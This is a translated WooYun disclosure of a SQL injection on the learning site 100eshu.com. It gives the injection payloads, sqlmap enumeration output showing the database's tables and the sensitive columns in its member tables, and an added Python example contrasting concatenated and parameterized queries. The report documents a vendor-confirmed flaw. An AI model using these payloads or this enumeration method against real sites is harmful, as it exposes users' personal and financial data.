
Vulnerability Summary

Defect ID: wooyun-2015-0114299

Title: SQL injection on 圣才学习网 (Shengcai Learning Network) leaks administrator accounts plus 200,000 user records (including phone numbers, e-mail addresses, QQ numbers and other sensitive data)

Affected vendor: 100eshu.com

Author: harbour_bin

Submitted: 2015-05-18 00:32

Fixed: 2015-07-02 00:54

Published: 2015-07-02 00:54

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or assistance contact [email protected]



Vulnerability Details

Disclosure status:

2015-05-18: Details sent to the vendor; awaiting vendor response
2015-05-18: Vendor confirmed; details visible to the vendor only
2015-05-28: Details opened to core white hats and domain experts
2015-06-07: Details opened to regular white hats
2015-06-17: Details opened to intern white hats
2015-07-02: Details opened to the public

Brief description:

Background: 圣才学习网 is the official learning site of 圣才教育 (Shengcai Education). It hosts about 50 subject-specific sub-sites, covering postgraduate and doctoral entrance exams, English, economics, securities, finance, insurance, management, foreign trade, accounting, statistics, actuarial science, psychology, education, law, medicine, journalism and communication, editing and publishing, engineering, IT, national vocational qualifications, civil service, secretarial work, Chinese, tour guiding, academic competitions and more. It is a fairly new site, but its reach seems considerable.
A SQL injection on 圣才学习网 leaks administrator accounts plus 200,000 user records.

Detailed description:

1. 圣才学习网 (the 100eshu.com site)

[screenshot: JIEUT.png]


2. Vulnerable URL (requires a logged-in user)

[screenshot: 漏洞.png]


3. Injection payloads (the id value is injected inside a single-quoted string literal)
2015051416054192' and '123'='123  -- returns data (true condition)
2015051416054192' and '123'='12   -- returns no data (false condition)
2015051416054192' and 1=(select @@VERSION) and '123'='123  -- version string
2015051416054192' and 1=db_name() and '123'='123  -- database name
4. Captured request

[screenshot: 抓包.png]


5. Run through sqlmap

[screenshot: 语句.png]
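Added example (not part of the original report, and not code from 100eshu.com): the probes in step 3 work because the looked-up id is spliced into the SQL text, so the closing quote and the trailing `and '123'='123` become part of the WHERE clause. The block below shows that concatenated lookup next to a parameterized one, using a constructed in-memory SQLite table; the table name `Data` and the column names `Id` and `Title` are assumptions, and the SQL Server-specific probes (`@@VERSION`, `db_name()`) are not reproduced.

```python
"""Added example: string-concatenated lookup versus a parameterized lookup,
exercised with the boolean probes quoted in the report. Table and column
names are assumptions; the data is constructed."""
import sqlite3

# Constructed sample rows; nothing here comes from the site's database.
SAMPLE_ROWS = [
    ("2015051416054192", "sample material A"),
    ("2015051416054193", "sample material B"),
]

# Probe values as they appear in the report (step 3); the application
# wraps the id in single quotes, which is what the leading ' closes.
PROBE_TRUE = "2015051416054192' and '123'='123"
PROBE_FALSE = "2015051416054192' and '123'='12"
LEGIT_ID = "2015051416054192"


def make_db() -> sqlite3.Connection:
    """Build the throwaway in-memory table used by both lookups."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Data (Id TEXT PRIMARY KEY, Title TEXT)")
    conn.executemany("INSERT INTO Data VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, id_value: str) -> int:
    """Concatenation: the user-supplied quote ends the literal and the rest of
    the value is parsed as SQL, so the row count follows the injected condition."""
    sql = "SELECT Id, Title FROM Data WHERE Id='" + id_value + "'"
    return len(conn.execute(sql).fetchall())


def lookup_safe(conn: sqlite3.Connection, id_value: str) -> int:
    """Parameterized: the whole value is bound as one string, so the quote and
    the 'and ...' fragment are just characters that no Id matches."""
    sql = "SELECT Id, Title FROM Data WHERE Id=?"
    return len(conn.execute(sql, (id_value,)).fetchall())


def demo() -> dict:
    """Row counts for each probe against both lookups."""
    conn = make_db()
    return {
        "vuln_true": lookup_vulnerable(conn, PROBE_TRUE),    # 1: condition true
        "vuln_false": lookup_vulnerable(conn, PROBE_FALSE),  # 0: condition false
        "safe_true": lookup_safe(conn, PROBE_TRUE),          # 0: literal mismatch
        "safe_false": lookup_safe(conn, PROBE_FALSE),        # 0: literal mismatch
        "safe_legit": lookup_safe(conn, LEGIT_ID),           # 1: normal lookup
    }


if __name__ == "__main__":
    for name, count in demo().items():
        print(f"{name}: {count} row(s)")
```

The difference between `vuln_true` and `vuln_false` is exactly the "has data / no data" oracle the report uses; with the parameterized lookup both probes return zero rows and the only way to get a row is a genuine id, which removes the oracle entirely. The same fix applies regardless of database engine, so the MSSQL functions the report also calls are closed off by it too.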


Proof of vulnerability:

1. Manual injection results

[screenshot: 数据库.png]


2. Version information

[screenshot: Banner.png]


3. Databases

[screenshot: Database.png]


4. Database user

[screenshot: User.png]


5. Administrator accounts

[screenshot: 管理员.png]


[screenshot: 管理员详情.png]

The MD5 password hashes were not cracked.
6. User tables

Database: SCEbook
[146 tables]
+------------------------------------+
| AdminRight |
| AdminRole |
| AdminUser |
| Advertisement |
| Agent |
| AllMemberInfo |
| All_TJ |
| All_TJ_Download_Exam |
| All_TJ_Download_Exam_TK |
| All_TJ_Download_XXSub |
| All_TJ_TK |
| ApplePrice |
| BankList |
| BlackListIP |
| BookAgent |
| BookRelate |
| Config |
| ConfigCode |
| CorpInfo |
| Data |
| DataCategory |
| DataCheckReason |
| DataOperate |
| DataReport |
| DictionaryTable |
| DomainCategory |
| EBookArr |
| EBookConverting |
| EBookIdAndAgent |
| EBookIdAndAgentRenda |
| EBook_Media |
| Ebook |
| EbookActMember |
| EbookAdvertisement |
| EbookCategory |
| EbookCategoryFTP |
| EbookCategorySub |
| EbookCategorySub_Ebook |
| EbookCheckReason |
| EbookComment |
| EbookCommentReply |
| EbookDemo |
| EbookDraft |
| EbookEvaluateSetting |
| EbookExpire |
| EbookFeedBack |
| EbookFeedBackReply |
| EbookGroup |
| EbookGroupElement |
| EbookOperate |
| EbookPwd |
| EbookPwdGenerate |
| EbookRecommend |
| EbookRecommendDetail |
| EbookXueXi |
| Ebook_Apple |
| Ebook_Dangdang |
| EditorTool |
| EmailTemplate |
| Experience |
| FeeItem |
| FileInFolder |
| FolderCategory |
| FolderCategorySub |
| FolderCategorySub_Ebook |
| FolderCategory_TJ |
| Help |
| HelpCategory |
| IpAddress |
| Log |
| MaterialPackage |
| MaterialRegistrationCodeModel |
| Member |
| MemberAttr |
| MemberBankList |
| MemberBuy |
| MemberBuy_Stolen |
| MemberBuy_del |
| MemberClass |
| MemberClassRight |
| MemberFocus |
| MemberInstitute |
| MemberInvoice |
| MemberNetDisk |
| MemberOrder |
| MemberOrderPay |
| MemberRight |
| MemberRightItem |
| MemberRightItemCategory |
| MemberSearchTJ |
| Menu |
| Message |
| MobileAdvisement |
| MobileInstructImage |
| MobileInterfaceLimit |
| MoneyWater |
| News |
| PageSeo |
| PayConfiguration |
| PlatBookDownLoad |
| PlatBookDownLoading |
| PlatBookDownload_LastDay |
| PlatBookDownload_LastMonth |
| PlatBookDownload_LastYear |
| PlatBookPublish |
| PlatBookPublishAndPlatBookDownLoad |
| PlatBookPublish_EbookTK |
| PlatBookPublish_EbookTK_WithHezuo |
| PlatCross |
| PricePasswordTJ |
| QQOpenId |
| Question |
| QuestionReply |
| QuoteProduct |
| RegistrationAttr |
| RegistrationCodeBatch |
| RegistrationCodeBatch_bak |
| RegistrationCodeModel |
| RegistrationCodeModelBak |
| RegistrationCodeModel_del |
| ScNetDisk |
| Score |
| ScoreExchange |
| ScoreWater |
| TestCatTree |
| Tree |
| UserSearchTJ |
| VEbookAndApple |
| VEbookDownLoadCount |
| VRenda |
| V_FavorAndDownloadList |
| V_MemberBuyInfo |
| VarSize |
| View_1 |
| View_2 |
| View_EbookAndTb_E_QuestionPlan |
| View_MemberOrderForCenterU |
| Word |
| WordCategory |
| XXProductBuy |
| XXProductBuy_TJ |
| XXProductBuy_TJ_exam |
| book |
| tempT |
| v_AliveCodeEBook |
| v_AliveCodeTiKu |
+------------------------------------+
Database: SCEbook
Table: Member
[60 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| Address | varchar |
| AddTime | datetime |
| AllUserId | int |
| BankNo | varchar |
| CellPhone | varchar |
| CertificateApplyTime | datetime |
| CertificateType | int |
| City | varchar |
| Class | int |
| client_key | varchar |
| ContactMan | nchar |
| ContactQQ | nchar |
| ContactTel | nchar |
| CorpLogo | varchar |
| CostermerServiceQQ | nvarchar |
| CostermerServiceTel | nvarchar |
| DomainName | nvarchar |
| Education | varchar |
| Email | varchar |
| EndTime | datetime |
| Id | varchar |
| IdNo | varchar |
| IsAgency | int |
| IsCertificate | int |
| IsDefaultSign | int |
| IsForbidden | int |
| IsValidEmail | int |
| LoginCount | int |
| MemberAdmin | int |
| MemberLogo | nvarchar |
| Name | varchar |
| NickName | varchar |
| OauthType | int |
| OfficialWebSite1 | nvarchar |
| OfficialWebSite2 | nvarchar |
| OpenId | varchar |
| PayNo | varchar |
| Phone | varchar |
| Photo | varchar |
| PostCode | varchar |
| Publisher | nvarchar |
| Pwd | varchar |
| QQ | varchar |
| RealName | varchar |
| RecentLoginIp | varchar |
| RecentLoginProvince | varchar |
| RecentLoginTime | datetime |
| RegIp | varchar |
| RegProvince | varchar |
| SendKeyTime | datetime |
| Sex | varchar |
| SiteIntroduction | ntext |
| SiteName | nvarchar |
| SiteSign | ntext |
| StartTime | datetime |
| TenpayNo | varchar |
| ValidEmail | varchar |
| ValidEmailKey | varchar |
| Writer | varchar |
| WriterBrief | varchar |
+----------------------+----------+
Database: SCEbook
Table: AllMemberInfo
[73 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| Address | varchar |
| AddTime | datetime |
| BankNo | varchar |
| CellPhone | varchar |
| CertificateApplyTime | datetime |
| CertificateType | int |
| City | varchar |
| Class | int |
| client_key | varchar |
| ContactMan | nchar |
| ContactQQ | nchar |
| ContactTel | nchar |
| CorpLogo | varchar |
| CostermerServiceQQ | nvarchar |
| CostermerServiceTel | nvarchar |
| DomainName | nvarchar |
| Education | varchar |
| Email | varchar |
| EndTime | datetime |
| Expr1 | varchar |
| Expr2 | datetime |
| Ext1 | varchar |
| Ext10 | varchar |
| Ext2 | varchar |
| Ext3 | varchar |
| Ext4 | varchar |
| Ext5 | varchar |
| Ext6 | varchar |
| Ext7 | varchar |
| Ext8 | varchar |
| Ext9 | varchar |
| Id | varchar |
| IdNo | varchar |
| IsAgency | int |
| IsCertificate | int |
| IsCheck | bit |
| IsDefaultSign | int |
| IsForbidden | int |
| IsValidEmail | int |
| LicencePic | varchar |
| LoginCount | int |
| MemberAdmin | int |
| MemberLogo | nvarchar |
| Name | varchar |
| NickName | varchar |
| OauthType | int |
| OfficialWebSite1 | nvarchar |
| OfficialWebSite2 | nvarchar |
| OpenId | varchar |
| PayNo | varchar |
| Phone | varchar |
| Photo | varchar |
| PostCode | varchar |
| Publisher | nvarchar |
| Pwd | varchar |
| QQ | varchar |
| RealName | varchar |
| RecentLoginIp | varchar |
| RecentLoginProvince | varchar |
| RecentLoginTime | datetime |
| RegIp | varchar |
| RegProvince | varchar |
| SendKeyTime | datetime |
| Sex | varchar |
| SiteIntroduction | ntext |
| SiteName | nvarchar |
| SiteSign | ntext |
| StartTime | datetime |
| TenpayNo | varchar |
| ValidEmail | varchar |
| ValidEmailKey | varchar |
| Writer | varchar |
| WriterBrief | varchar |
+----------------------+----------+


7. Proof of the 200,000 records

[screenshot: AllMemberInfo.png]


Stopped here; this should count as fairly serious.

Remediation:

You know better than I do!

Copyright notice: please credit harbour_bin@乌云 (WooYun) when reposting.


Vendor Response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-05-18 00:53

Vendor reply:

Thanks

Latest status:

None


Vulnerability rating:

Comments

  1. 2015-05-15 17:31 | sql小神 ( Passerby | Rank:19 Vulns:4 | Some vulnerabilities can be submitted, some cannot. )

    You're really dedicated. You're from Hangzhou, right? Ride the subway a lot?

  2. 2015-05-15 18:06 | harbour_bin ( Regular white hat | Rank:358 Vulns:47 | Marching toward the TOP 200! )

    @sql小神 Uh, what do you mean?

  3. 2015-05-15 18:28 | sql小神 ( Passerby | Rank:19 Vulns:4 | Some vulnerabilities can be submitted, some cannot. )

    @harbour_bin This ad is plastered all over the Hangzhou subway; I thought you saw it while riding.

  4. 2015-05-15 18:45 | harbour_bin ( Regular white hat | Rank:358 Vulns:47 | Marching toward the TOP 200! )

    @sql小神 Oh, heh. A couple of days ago I wanted to download some study material, tried it out of habit, and this is what happened.